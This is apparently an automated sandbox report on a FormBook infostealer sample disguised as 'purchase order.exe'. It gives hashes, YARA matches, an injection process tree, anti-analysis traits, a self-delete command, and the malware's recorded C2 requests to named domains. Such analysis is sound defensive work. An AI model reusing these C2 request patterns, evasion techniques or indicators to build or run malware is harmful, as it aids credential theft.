Analysis Report purchase order.exe

Overview

General Information

Sample Name: purchase order.exe
Analysis ID: 323034
MD5: 975187a07455d3cbf38ec878d893b490
SHA1: af8ddbf775cdb9dbd3776f717c192094202127be
SHA256: 009d9a0f6fafa91b750271413fef5771a4ce5855a59c0e6c16c85eb7de08e52b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • purchase order.exe (PID: 3900 cmdline: 'C:\Users\user\Desktop\purchase order.exe' MD5: 975187A07455D3CBF38EC878D893B490)
    • purchase order.exe (PID: 4672 cmdline: C:\Users\user\Desktop\purchase order.exe MD5: 975187A07455D3CBF38EC878D893B490)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6468 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6508 cmdline: /c del 'C:\Users\user\Desktop\purchase order.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
    00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18409:$sqlite3step: 68 34 1C 7B E1
      • 0x1851c:$sqlite3step: 68 34 1C 7B E1
      • 0x18438:$sqlite3text: 68 38 2A 90 C5
      • 0x1855d:$sqlite3text: 68 38 2A 90 C5
      • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

        Unpacked PEs

        Source | Rule | Description | Author | Strings
        2.2.purchase order.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.purchase order.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.purchase order.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          2.2.purchase order.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
            2.2.purchase order.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            AV Detection:

            Multi AV Scanner detection for submitted file
            Source: purchase order.exe, Virustotal: Detection: 28%
            Source: purchase order.exe, ReversingLabs: Detection: 19%
            Yara detected FormBook
            Source: Yara match, File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for sample
            Source: purchase order.exe, Joe Sandbox ML: detected
            Source: 2.2.purchase order.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: C:\Users\user\Desktop\purchase order.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 0_2_06A2A760
            Source: C:\Users\user\Desktop\purchase order.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 0_2_06A2A755
            Source: C:\Users\user\Desktop\purchase order.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 0_2_06A21CEC
            Source: C:\Users\user\Desktop\purchase order.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 0_2_06A21CF8

            Networking:

            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.6:49750
            Source: global traffic, HTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1 Host: www.rettexo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1 Host: www.makgxoimisitzer.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1 Host: www.purehempbotanicalsinfo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox View, IP Address: 34.102.136.180
            Source: Joe Sandbox View, ASN Name: GOOGLEUS
            Source: Joe Sandbox View, ASN Name: UNMETEREDCA
            Source: Joe Sandbox View, ASN Name: TOTAL-SERVER-SOLUTIONSUS
            Source: unknown, DNS traffic detected: queries for: g.msn.com

            E-Banking Fraud:

            Yara detected FormBook

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious name
            Source: initial sample, Static PE information: Filename: purchase order.exe
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1015C NtQueryInformationProcess,0_2_02B1015C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B10B88 NtQueryInformationProcess,0_2_02B10B88
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041A050 NtClose,2_2_0041A050
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041A100 NtAllocateVirtualMemory,2_2_0041A100
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419F20 NtCreateFile,2_2_00419F20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419FD0 NtReadFile,2_2_00419FD0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419FCA NtReadFile,2_2_00419FCA
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_017E9910
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E99A0 NtCreateSection,LdrInitializeThunk,2_2_017E99A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_017E9860
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9840 NtDelayExecution,LdrInitializeThunk,2_2_017E9840
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_017E98F0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A50 NtCreateFile,LdrInitializeThunk,2_2_017E9A50
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A20 NtResumeThread,LdrInitializeThunk,2_2_017E9A20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_017E9A00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9540 NtReadFile,LdrInitializeThunk,2_2_017E9540
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E95D0 NtClose,LdrInitializeThunk,2_2_017E95D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,2_2_017E9710
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_017E97A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,2_2_017E9780
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_017E9660
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017E96E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9950 NtQueueApcThread,2_2_017E9950
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E99D0 NtCreateProcessEx,2_2_017E99D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EB040 NtSuspendThread,2_2_017EB040
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9820 NtEnumerateKey,2_2_017E9820
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E98A0 NtWriteVirtualMemory,2_2_017E98A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9B00 NtSetValueKey,2_2_017E9B00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA3B0 NtGetContextThread,2_2_017EA3B0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A10 NtQuerySection,2_2_017E9A10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A80 NtOpenDirectoryObject,2_2_017E9A80
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9560 NtWriteFile,2_2_017E9560
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EAD30 NtSetContextThread,2_2_017EAD30
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9520 NtWaitForSingleObject,2_2_017E9520
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E95F0 NtQueryInformationFile,2_2_017E95F0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA770 NtOpenThread,2_2_017EA770
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9770 NtSetInformationFile,2_2_017E9770
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9760 NtOpenProcess,2_2_017E9760
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9730 NtQueryVirtualMemory,2_2_017E9730
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA710 NtOpenProcessToken,2_2_017EA710
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9FE0 NtCreateMutant,2_2_017E9FE0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9670 NtQueryInformationProcess,2_2_017E9670
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9650 NtQueryValueKey,2_2_017E9650
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9610 NtEnumerateValueKey,2_2_017E9610
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E96D0 NtCreateKey,2_2_017E96D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048995D0 NtClose,LdrInitializeThunk,5_2_048995D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899540 NtReadFile,LdrInitializeThunk,5_2_04899540
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048996D0 NtCreateKey,LdrInitializeThunk,5_2_048996D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048996E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048996E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899650 NtQueryValueKey,LdrInitializeThunk,5_2_04899650
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04899660
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899780 NtMapViewOfSection,LdrInitializeThunk,5_2_04899780
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899FE0 NtCreateMutant,LdrInitializeThunk,5_2_04899FE0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899710 NtQueryInformationToken,LdrInitializeThunk,5_2_04899710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899840 NtDelayExecution,LdrInitializeThunk,5_2_04899840
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04899860
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048999A0 NtCreateSection,LdrInitializeThunk,5_2_048999A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04899910
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A50 NtCreateFile,LdrInitializeThunk,5_2_04899A50
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048995F0 NtQueryInformationFile,5_2_048995F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899520 NtWaitForSingleObject,5_2_04899520
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489AD30 NtSetContextThread,5_2_0489AD30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899560 NtWriteFile,5_2_04899560
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899610 NtEnumerateValueKey,5_2_04899610
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899670 NtQueryInformationProcess,5_2_04899670
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048997A0 NtUnmapViewOfSection,5_2_048997A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A710 NtOpenProcessToken,5_2_0489A710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899730 NtQueryVirtualMemory,5_2_04899730
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899760 NtOpenProcess,5_2_04899760
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A770 NtOpenThread,5_2_0489A770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899770 NtSetInformationFile,5_2_04899770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048998A0 NtWriteVirtualMemory,5_2_048998A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048998F0 NtReadVirtualMemory,5_2_048998F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899820 NtEnumerateKey,5_2_04899820
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489B040 NtSuspendThread,5_2_0489B040
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048999D0 NtCreateProcessEx,5_2_048999D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899950 NtQueueApcThread,5_2_04899950
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A80 NtOpenDirectoryObject,5_2_04899A80
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A00 NtProtectVirtualMemory,5_2_04899A00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A10 NtQuerySection,5_2_04899A10
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A20 NtResumeThread,5_2_04899A20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A3B0 NtGetContextThread,5_2_0489A3B0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899B00 NtSetValueKey,5_2_04899B00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063A050 NtClose,5_2_0063A050
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063A100 NtAllocateVirtualMemory,5_2_0063A100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639F20 NtCreateFile,5_2_00639F20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639FD0 NtReadFile,5_2_00639FD0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639FCA NtReadFile,5_2_00639FCA
            Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0485B150 appears 48 times
            Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 017AB150 appears 35 times
            Source: purchase order.exe, 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs purchase order.exe
            Source: purchase order.exe, 00000000.00000000.333598877.00000000009B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
            Source: purchase order.exe, 00000002.00000000.353042240.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs purchase order.exe
            Source: purchase order.exeBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
